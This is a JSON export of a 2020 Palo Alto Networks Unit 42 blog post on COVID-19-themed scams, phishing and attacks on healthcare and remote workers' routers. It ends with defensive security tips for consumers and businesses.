{"id":116213,"date":"2020-07-21T06:00:57","date_gmt":"2020-07-21T13:00:57","guid":{"rendered":"https:\/\/www.paloaltonetworks.com\/blog\/?p=116213"},"modified":"2020-10-09T12:48:38","modified_gmt":"2020-10-09T19:48:38","slug":"unit-42-cybercrime-gold-rush","status":"publish","type":"post","link":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/2020\/07\/unit-42-cybercrime-gold-rush\/","title":{"rendered":"COVID-19: The Cybercrime Gold Rush of 2020"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">If you told me at the start of 2020 that for the first time in the history of cybersecurity, we\u2019d see every industry and every type of device across the globe targeted by attacks based around a single theme, I wouldn\u2019t have believed you. If you told me this theme would hinge on exploiting a global pandemic and attackers would target even medical researchers on the front lines trying to stop this disease, I wouldn\u2019t have believed that either. Yet, here we are, and our reality indeed includes a cybercrime gold rush aimed at taking advantage of COVID-19.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Just last week, the United Kingdom\u2019s National Cyber Security Centre, Canada\u2019s Communications Security Establishment and the United States National Security Agency issued a <\/span><a href=\"https:\/\/media.defense.gov\/2020\/Jul\/16\/2002457639\/-1\/-1\/0\/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">joint advisory<\/span><\/a><span style=\"font-weight: 400;\"> detailing how Cozy Bear (APT29) were employed by the Russian government to target organizations involved in COVID-19 vaccine development within those three countries.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The researchers on the Unit 42 threat intelligence team at Palo Alto Networks are closely tracking a plethora of COVID-19-themed cyber attacks that have emerged around the world over the past few months. Since the beginning of this year, <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/how-cybercriminals-prey-on-the-covid-19-pandemic\/\"><span style=\"font-weight: 400;\">we\u2019ve identified more than 40,000 newly registered websites<\/span><\/a><span style=\"font-weight: 400;\">, using a coronavirus-related name, which we\u2019d classify as \u201chigh-risk\u201d sites due to the scams and malware being pushed onto unsuspecting consumers.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">The global impact of the COVID-19 pandemic, coupled with <\/span><a href=\"https:\/\/www.edelman.com\/news-awards\/2020-edelman-trust-barometer\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">a lack of trust in the government and media as reliable sources of information<\/span><\/a><span style=\"font-weight: 400;\">, has ultimately created a perfect storm for cybercriminals to have greater success. People are constantly looking for new sources of supplies and information, and cybercriminals have taken the opportunity to exploit this.\u00a0<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Why It Matters<\/strong><\/h2>\n<p><span style=\"font-weight: 400;\">Attackers have honed in on the opportunity around people searching for COVID-19 updates and shopping for essential goods online by <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/how-cybercriminals-prey-on-the-covid-19-pandemic\/\"><span style=\"font-weight: 400;\">creating profit-motivated attacks<\/span><\/a><span style=\"font-weight: 400;\">.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">We\u2019ve found:<\/span><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Scam sites offering items like face masks and hand sanitizer for low prices.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Fake COVID-19 ebooks, promising new \u201ctips\u201d on how to stay safe. In actuality, these sites deliver no product after the purchase is completed and instead, just steal both the money and all the personal and financial information uploaded to the site.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Evidence that suggests cybercriminals are also creating fail-safe websites that are currently dormant, waiting to be quickly spun up when another scam site of theirs is taken down.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Cybercriminals using cloud service providers (such as Amazon, Google, Microsoft and Alibaba) <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/covid-19-cloud-threat-landscape\/\"><span style=\"font-weight: 400;\">to host some of these malicious sites<\/span><\/a><span style=\"font-weight: 400;\"> because when threats originate from the cloud, it can be easier to evade detection by misusing a cloud provider\u2019s resources. (Thanks to the rigorous screening and monitoring processes employed by these cloud providers, and likely due to the higher costs with using them, it\u2019s been relatively rare so far for malicious actors to host malicious domains in public clouds.)<\/span><\/li>\n<\/ul>\n<p><span style=\"font-weight: 400;\">We\u2019ve also uncovered \u2013 and blocked \u2013 a wide variety of cyber threats globally that are <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/covid-19-themed-cyber-attacks-target-government-and-medical-organizations\/\"><span style=\"font-weight: 400;\">recklessly targeting government healthcare agencies, local and regional governments, and large universities<\/span><\/a><span style=\"font-weight: 400;\"> that are dealing with the critical response efforts of the COVID-19 pandemic. Regions impacted include the US, Canada, Germany, Turkey, Korea and Japan.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">While it\u2019s not surprising that cybercriminals are seizing this opportunity to exploit the pandemic for their personal gain, it\u2019s clear the criminals who profit from cybercrime are going to any extent to succeed and are in it for the long haul.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">We\u2019re continuing to monitor and protect against these threats, but it\u2019s important to note that these shifts in behavior highlight that cybercriminals are investing time and resources to bolster their attacks.<\/span><\/p>\n<p>&nbsp;<\/p>\n<h2><strong>Looking Ahead<\/strong><\/h2>\n<p><span style=\"font-weight: 400;\">With COVID-19 cases continuing to rise in certain countries, and a second wave of the virus anticipated to hit later this year, we'll continue to see evolving themes from attackers related to news of the pandemic. For example, toward the end of June, we picked up malicious emails with the subject \"Supplier-Face Mask\/Forehead Thermometer\" and \"Supply medical mask, protective glasses and temperature gun.\" These are both topics that are more related to preparing for and returning to going out into the world, rather than staying home. I expect this evolving trend will continue based on the news and business priorities.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Additionally, we also anticipate that the U.S. will likely be targeted more by attackers compared to countries that no longer have COVID-19 causing an impact on daily life (such as New Zealand).<\/span><\/p>\n<p><span style=\"font-weight: 400;\">We also expect to see a spike in cybercrime as economies go into recessions. With unemployment numbers around the world dramatically growing, some people will inevitably turn to cybercrime, as <\/span><a href=\"https:\/\/searchcio.techtarget.com\/blog\/TotalCIO\/Economic-recession-to-spur-dramatic-increase-in-cybercrime\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">typically happens in economic downturns<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Lastly, <\/span><span style=\"font-weight: 400;\">given that more of the workforce is now working remotely from home, we anticipate an increase in attackers targeting home routers and other Internet of Things (IoT) devices to compromise home networks.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">These devices are already frequently targeted, especially since <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/iot-threat-report-2020\/\"><span style=\"font-weight: 400;\">98% of all IoT device traffic<\/span><\/a><span style=\"font-weight: 400;\"> is unencrypted, exposing personal and confidential data on the network and allowing attackers the ability to listen to unencrypted network traffic and collect personal or confidential information. While we don\u2019t have the data to show this is currently happening, a very likely scenario of the next step for attackers would be to shift their focus on home routers to do more than just <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices\/\"><span style=\"font-weight: 400;\">mine for cryptocurrency<\/span><\/a><span style=\"font-weight: 400;\"> or <\/span><a href=\"https:\/\/unit42.paloaltonetworks.com\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/\"><span style=\"font-weight: 400;\">launch DDoS attacks<\/span><\/a><span style=\"font-weight: 400;\">, as they have in the past. With more employees working from home and no longer being protected by an enterprise security tool and corporate firewall, attackers may begin trying to steal sensitive corporate data that they couldn\u2019t typically access as easily before. Consumers should make sure that their physical router isn\u2019t using the default password that comes with the router (often just \u201cAdmin\u201d). They also should update it to the latest firmware version. Too often, consumers create a password for only their wireless network and do not realize that the physical device also needs to have a unique password.\u00a0<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Here are our recommended tips for consumers and businesses to stay safe during this time:<\/span><\/p>\n<h4>Consumers:<\/h4>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Be wary of websites offering \u201ctoo-good-to-be-true\u201d deals on COVID-19 essentials, like face masks and hand sanitizer.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Treat all emails and websites purporting to offer information about COVID-19 as suspicious.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">To ensure you\u2019re not the victim of a phishing attack, always check for the three main indicators, shown in Figure 1 below: correct domain name, the presence of the padlock and valid certificate ownership.<\/span><\/li>\n<\/ul>\n<p><img loading=\"lazy\" decoding=\"async\"  class=\"alignright wp-image-116214 lozad\"  data-src=\"https:\/\/www.paloaltonetworks.com\/blog\/wp-content\/uploads\/2020\/07\/BofA.png\" alt=\"Avoid becoming a victim of the cybercrime gold rush by taking three actions to check the validity of websites, as shown here: 1) Verify if domain name is correct, 2) Look for padlock, 3) Validate certificate ownership\" width=\"500\" height=\"298\" \/><\/p>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">If you believe your credit card information was stolen as a result of a recent online purchase, you should contact your bank to freeze or change your card immediately.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Consider putting a freeze on your credit, so that new accounts can\u2019t be opened up using your personal information.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Make sure your home router has a physical password in addition to your Wi-Fi password. If you don\u2019t know how to do this, visit your device manufacturer\u2019s site to find their step-by-step instructions.\u00a0<\/span>\n<ul>\n<li style=\"font-weight: 400;\"><a href=\"https:\/\/www.linksys.com\/ca\/support-article?articleNum=135554\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">Instructions for Linksys<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\"><a href=\"https:\/\/kb.netgear.com\/23439\/How-do-I-change-my-NETGEAR-router-s-WiFi-password-or-network-name-SSID\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">Instructions for Netgear<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\"><a href=\"https:\/\/thedroidguy.com\/how-to-reset-asus-router-password-1091859\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">Instructions for ASUS<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\"><a href=\"https:\/\/eu.dlink.com\/uk\/en\/support\/faq\/routers\/mydlink-routers\/dir-810l\/how-do-i-change-the-wifi-password-on-my-router\" rel=\"nofollow,noopener\" ><span style=\"font-weight: 400;\">Instructions for D-Link<\/span><\/a><span style=\"font-weight: 400;\">.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<h4><\/h4>\n<h4>Businesses:<\/h4>\n<ul>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Run a <\/span><a href=\"https:\/\/www.paloaltonetworks.com\/services\/bpa\"><span style=\"font-weight: 400;\">Best Practice Assessment<\/span><\/a><span style=\"font-weight: 400;\"> to identify where your configuration could be altered to improve your security posture.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Use URL Filtering to block \u201cNewly-Registered Domains\u201d, which contains domains registered in the last 32 days.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">If you cannot block access to the Newly Registered Domains category, then our recommendation would be to enforce SSL decryption to these URLs for increased visibility and to block users from downloading risky file types such as PowerShells and executables.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">You can also apply a much stricter Threat Prevention policy and increase logging when accessing Newly Registered Domains. We also recommend <\/span><a href=\"https:\/\/www.paloaltonetworks.com\/blog\/2020\/04\/network-dns-security\/\"><span style=\"font-weight: 400;\">DNS-layer protection<\/span><\/a><span style=\"font-weight: 400;\">, as we know over 80% of malware uses DNS to establish C2.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">eCommerce and online retailers can mitigate risks by patching all their systems, components and web plugins to avoid being compromised.\u00a0<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Regularly conduct web content integrity checks offline to see if your pages were edited and had malicious JavaScript code inserted by attackers.<\/span><\/li>\n<li style=\"font-weight: 400;\"><span style=\"font-weight: 400;\">Make sure you\u2019re using strong passwords on your content management system (CMS) administrators to make it less susceptible to brute force attacks.<\/span><\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Unit 42 has been tracking a cybercrime gold rush aimed at taking advantage of the pandemic. Learn best practices to help avoid exploitation.<\/p>\n","protected":false},"author":65,"featured_media":108494,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[6765],"tags":[3967,7050,922,586],"coauthors":[704],"class_list":["post-116213","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-secure-the-enterprise","tag-best-practices","tag-covid-19","tag-threat-intelligence","tag-unit-42"],"jetpack_featured_media_url":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-content\/uploads\/2020\/03\/IMG_2009.jpg","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/posts\/116213","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/users\/65"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/comments?post=116213"}],"version-history":[{"count":4,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/posts\/116213\/revisions"}],"predecessor-version":[{"id":119415,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/posts\/116213\/revisions\/119415"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/media\/108494"}],"wp:attachment":[{"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/media?parent=116213"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/categories?post=116213"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/tags?post=116213"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-researchcenter.paloaltonetworks.com\/blog\/wp-json\/wp\/v2\/coauthors?post=116213"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}